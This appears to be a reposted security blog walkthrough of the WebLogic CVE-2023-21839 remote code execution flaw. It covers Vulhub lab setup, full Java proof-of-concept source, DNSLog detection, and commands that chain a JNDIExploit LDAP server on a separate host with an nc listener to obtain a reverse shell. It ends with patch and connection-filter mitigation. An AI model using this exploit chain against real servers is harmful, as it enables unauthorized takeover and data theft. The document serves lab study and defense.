WebLogic has a remote code execution vulnerability (CVE-2023-21839 / CNVD-2023-04389). Because of a flaw in the WebLogic IIOP/T3 protocol handling, when IIOP/T3 is enabled an unauthenticated attacker with network access over IIOP/T3 can attack WebLogic Server. Successful exploitation lets the attacker take over WebLogic Server and execute arbitrary commands, which can crash the server or leak sensitive data.
Severity: high
Identifiers:
- CNVD-2023-04389
- CVE-2023-21839
Affected versions
The following versions are affected:
12.2.1.2.0
12.2.1.1.0
12.2.1.3.0
12.2.1.0.0
12.2.1.4.0
14.1.1.0.0
12.1.2.0.0
12.1.3.0.0
10.3.6.0
FOFA query:
app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"
Vulfocus has integrated this vulnerability environment; it can be pulled with:
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.2.0-jdk-release
Vulnerability reproduction
This walkthrough deploys the Vulhub environment with Docker.
1. Install the latest version of Docker
curl -s https://get.docker.com/ | sh
Note: some Linux distributions are not compatible with the newest Docker release. Either upgrade the Linux kernel or downgrade Docker. To switch Docker versions:
(1) Install a specific version: sudo apt-get install docker-ce=17.12.1~ce-0~ubuntu
(2) Uninstall docker-ce:
sudo apt-get autoremove docker-ce
(3) List the stable versions available:
sudo apt-cache madison docker-ce
2. Start the docker service
service docker start
3. Install pip
apt-get install python-pip
4. Install docker-compose
pip install docker-compose (if the download is too slow, fetch it elsewhere and copy it to the virtual machine)
5. Configure docker acceleration
curl -sSL https://get.daocloud.io/daotools/set_mirror.sh | sh -s http://f1361db2.m.daocloud.io
6. Download or clone Vulhub
git clone https://github.com/vulhub/vulhub.git (if the download is too slow, fetch it elsewhere and copy it to the virtual machine)
7. Enter Vulhub
cd vulhub-master/
8. Enter the directory of the chosen vulnerability environment
cd /home/vulhub1/Desktop/vulhub-master/weblogic/CVE-2023-21839
9. Build the vulnerability environment
sudo docker-compose build (only some environments need a build step; this one does not)
10. Start the vulnerability environment
docker-compose up -d
11. Check the vulnerability environment
docker ps
12. Access the vulnerability environment
Browse to the VPS public IP and the mapped port. Each vulnerability directory contains a README.md describing the environment; view it with cat.
13. Stop the vulnerability environment (no rebuild is needed next time; run the command from the same directory)
docker-compose down
14. Visit http://127.0.0.1:7001/console/login/LoginForm.jsp; the vulnerable environment is now up.
Note: the goal of this exercise is to obtain a reverse shell from the target (range) server A.
Exploitation
DNSLog detection
EXP link: https://github.com/DXask88MA/Weblogic-CVE-2023-21839 (packaged as a jar)
PoC source code (the WebLogic client classes must be on the classpath to compile and run it):
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;

public class CVE_2023_21839 {
    static String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
    static String HOW_TO_USE = "[*]java -jar target ip: port ldap address\\ e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/ 1111";

    // Open a T3 JNDI context against the given WebLogic address
    private static InitialContext getInitialContext(String url) throws NamingException {
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        return new InitialContext(env);
    }

    public static void main(String[] args) throws Exception {
        if (args.length < 2) {
            System.out.println(HOW_TO_USE);
            System.exit(0);
        }
        String t3Url = args[0];
        String ldapUrl = args[1];
        InitialContext c = getInitialContext("t3://" + t3Url);

        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");

        // Private fields of ForeignOpaqueReference are set via reflection
        weblogic.deployment.jms.ForeignOpaqueReference f = new weblogic.deployment.jms.ForeignOpaqueReference();
        Field jndiEnvironment = weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f, env);
        Field remoteJNDIName = weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        remoteJNDIName.set(f, ldapUrl);

        String bindName = new Random(System.currentTimeMillis()).nextLong() + "";
        try {
            c.bind(bindName, f);
            c.lookup(bindName);
        } catch (Exception e) {
        }
    }
}
(1) Use attack machine B to run the exp against range server A. Running the exp requires a Java 1.8 environment. I use Kali 2021.
(2) Uninstall the stock JDK 11 first, then install JDK 1.8.
Reference: https://www.yuque.com/u2114382/odrch9/uhac2mnslbctxpwd
(3) After running the following command on the attack machine, refresh the DNSLog page.
java -jar Weblogic-CVE-2023-21839.jar <range server ip>:7001 ldap://kejajb.dnslog.cn
Reverse shell
(1) First, use the JNDIExploit-1.4-SNAPSHOT.jar tool to start the LDAP service.
Download link: https://github.com/WhiteHSBG/JNDIExploit
(2) After downloading, set up the LDAP service on server C, which simply means starting the jar above:
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i <server C ip>
(3) Once it is running, a listener is needed: start nc on server C listening on a port.
(4) Now run the exp from attack machine B:
java -jar Weblogic-CVE-2023-21839.jar <range ip>:7001 ldap://<ldap server ip>:1389/Basic/ReverseShell/<ldap server ip>/<nc listening port>
(5) Check server C: the reverse shell has connected.
Remediation
Oracle has released a patch that fixes the vulnerability.
Mitigation: disable the T3 and IIOP protocols if they are not needed.
Patch download link:
https://support.oracle.com/rs?type=doc&id=2917213.2
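As an added example (not part of the original post or Oracle's advisory), the mitigation above can be enforced with a WebLogic network connection filter instead of a blanket protocol switch: set the built-in weblogic.security.net.ConnectionFilterImpl as the Connection Filter under Security > Filter in the Administration Console and enter rules like the following. Rules are evaluated in order, first match wins, so a trusted administration subnet (10.0.0.0/8 here is an assumed placeholder) is allowed before the catch-all deny.

```text
# Connection Filter: weblogic.security.net.ConnectionFilterImpl
# Rule format: targetAddress localAddress localPort action protocols
# Before: no rules -> T3/IIOP accepted from any source
# After:
10.0.0.0/8   *  *  allow  t3 t3s              # assumed admin/management subnet only
0.0.0.0/0    *  *  deny   t3 t3s iiop iiops   # refuse T3/IIOP from everywhere else
```

After applying the rules, a t3:// connection from an address outside the allowed subnet is refused while HTTP on port 7001 is unaffected, which also makes the earlier DNSLog test a quick way to confirm the filter works.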
Source: https://www.freebuf.com/vuls/364212.html
Statement: The technologies, ideas and tools in this article are provided only for security-oriented learning and exchange. No one may use them for illegal purposes or for profit; anyone who does so bears the consequences. All penetration testing requires authorization!